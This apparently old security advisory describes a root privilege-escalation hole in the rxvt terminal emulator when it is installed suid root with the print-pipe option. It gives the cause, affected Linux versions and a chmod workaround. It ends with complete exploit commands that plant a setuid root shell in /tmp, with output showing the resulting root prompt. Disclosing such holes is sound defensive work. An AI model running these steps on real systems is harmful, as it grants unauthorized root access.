There is a major security hole in rxvt, a terminal emulator for X, when it is run on systems suid root, as is required on many configurations in order to write to the utmp file. It is obvious from the code that this program was not written to be run suid root, its a pity that sysadmins that install the compiled versions of this sort of code don't see the same warnings of 'run suid root at your own risk' that the people that put together a distribution with it that way see in the makefile. The conditions that allow this particular hole to be exploited is rxvt compiled with the PRINT_PIPE option, and is running suid root. The program sets the pipe to "lpr", without a pathname, but its even easier than that to exploit because we can set the pipe to whatever we want with the -print-pipe option on the rxvt command line. Although the programs gives up its root privileges when forking to runn a shell or other command, the original program continues running suid root the entire execution of the program. Because the popen() call runs as root, whatever program that pipe opens will execute immediately as root. In order to start the printer pipe, the vt100 printer-on command is ESC[5i. The pipe can then be closed with the printer-off commad, ESC[4i. Exploiting this is extremely easy. Program: rxvt Affected Operating Systems: Linux Slackware 3.0, RedHat 2.1, others with rxvt suid root (and compiled with PRINT_PIPE) Requirements: account on system, X server Temporary Patch: chmod -s /usr/X11R6/bin/rxvt Security Compromise: root Author: Dave M. (davem@cmu.edu) Synopsis: rxvt fails to give up root privileges before opening a pipe to a program that can be specified by the user. Exploit: 1. Set DISPLAY environment variable if necessary so you can use x clients. 2. In user shell: $ echo 'cp /bin/sh /tmp/rxsh;chmod 4755 /tmp/rxsh' > /tmp/rxbug $ chmod +x /tmp/rxbug $ rxvt -print-pipe /tmp/rxbug 3. In rxvt xclient: $ cat ESC[5i ESC[4i (The client will close at this point with a broken pipe) 4. $ /tmp/rxsh # whoami root #